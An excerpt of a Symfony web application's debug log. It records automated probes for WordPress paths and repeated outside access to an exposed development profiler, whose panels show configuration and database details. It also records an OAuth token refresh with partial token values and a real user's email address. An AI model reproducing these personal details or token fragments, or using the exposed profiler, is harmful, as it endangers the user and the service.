  7733. [2025-12-20 18:43:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7734. [2025-12-20 18:43:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  7735. [2025-12-20 18:44:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7736. [2025-12-20 18:44:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7737. [2025-12-20 18:44:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7738. [2025-12-20 18:44:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7739. [2025-12-20 18:44:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7740. [2025-12-20 18:44:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7741. [2025-12-20 18:44:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7742. [2025-12-20 18:44:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7743. [2025-12-20 18:44:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7744. [2025-12-20 18:44:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7745. [2025-12-20 18:44:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7746. [2025-12-20 18:44:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7747. [2025-12-20 18:44:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7748. [2025-12-20 18:44:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7749. [2025-12-20 18:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7750. [2025-12-20 18:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7751. [2025-12-20 18:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7752. [2025-12-20 18:44:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7753. [2025-12-20 18:44:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7754. [2025-12-20 18:52:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=time","method":"GET"} []
  7755. [2025-12-20 18:52:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  7756. [2025-12-20 19:00:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a26a5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a26a5e?panel=twig","method":"GET"} []
  7757. [2025-12-20 19:00:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  7758. [2025-12-20 19:01:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8098e0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8098e0?panel=db","method":"GET"} []
  7759. [2025-12-20 19:01:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  7760. [2025-12-20 19:02:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=config","method":"GET"} []
  7761. [2025-12-20 19:02:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  7762. [2025-12-20 19:05:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"30da96","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/30da96","method":"GET"} []
  7763. [2025-12-20 19:05:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  7764. [2025-12-20 19:12:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=db","method":"GET"} []
  7765. [2025-12-20 19:12:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  7766. [2025-12-20 19:12:58] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3f708d","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/3f708d/search/results?limit=10&method=GET","method":"GET"} []
  7767. [2025-12-20 19:12:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  7768. [2025-12-20 19:13:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f7acf9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f7acf9?panel=config","method":"GET"} []
  7769. [2025-12-20 19:13:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  7770. [2025-12-20 19:13:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  7771. [2025-12-20 19:13:55] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  7772. [2025-12-20 19:13:55] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7773. [2025-12-20 19:13:55] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7774. [2025-12-20 19:13:55] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7775. [2025-12-20 19:13:55] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7776. [2025-12-20 19:13:55] security.DEBUG: Calling Authentication entry point. [] []
  7777. [2025-12-20 19:17:50] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"711f96","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/711f96/search/results?limit=10&method=POST","method":"GET"} []
  7778. [2025-12-20 19:17:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=POST","method":"GET"} []
  7779. [2025-12-20 19:18:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=52.167.144.161&limit=10","method":"GET"} []
  7780. [2025-12-20 19:18:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=52.167.144.161&limit=10","method":"GET"} []
  7781. [2025-12-20 19:22:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a26a5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a26a5e?panel=time","method":"GET"} []
  7782. [2025-12-20 19:22:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  7783. [2025-12-20 19:29:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=207.180.196.165&limit=10&method=POST&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
  7784. [2025-12-20 19:29:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=207.180.196.165&limit=10&method=POST&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
  7785. [2025-12-20 19:30:07] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  7786. [2025-12-20 19:30:07] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  7787. [2025-12-20 19:30:07] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["3d8ae38adb2908af83e0a5c5e4 [...]"] []
  7788. [2025-12-20 19:30:07] doctrine.DEBUG: "START TRANSACTION" [] []
  7789. [2025-12-20 19:30:07] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"44b5b9e6a8d88fdffe816d2232 [...]","3":"2025-12-20 20:00:07","4":"","5":398,"6":"[]"} []
  7790. [2025-12-20 19:30:07] doctrine.DEBUG: "COMMIT" [] []
  7791. [2025-12-20 19:30:07] doctrine.DEBUG: "START TRANSACTION" [] []
  7792. [2025-12-20 19:30:07] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"ac37f938310f627b158741a7fa [...]","3":"2026-02-18 19:30:07","4":"","5":398,"6":"[]"} []
  7793. [2025-12-20 19:30:07] doctrine.DEBUG: "COMMIT" [] []
  7794. [2025-12-20 19:30:07] doctrine.DEBUG: "START TRANSACTION" [] []
  7795. [2025-12-20 19:30:07] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"3d8ae38adb2908af83e0a5c5e4 [...]"] []
  7796. [2025-12-20 19:30:07] doctrine.DEBUG: "COMMIT" [] []
  7797. [2025-12-20 19:30:07] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  7798. [2025-12-20 19:30:07] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  7799. [2025-12-20 19:30:07] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7800. [2025-12-20 19:30:07] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7801. [2025-12-20 19:30:07] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7802. [2025-12-20 19:30:07] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
  7803. [2025-12-20 19:30:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  7804. [2025-12-20 19:30:07] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7805. [2025-12-20 19:30:07] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7806. [2025-12-20 19:30:07] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7807. [2025-12-20 19:30:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  7808. [2025-12-20 19:30:07] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  7809. [2025-12-20 19:30:07] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
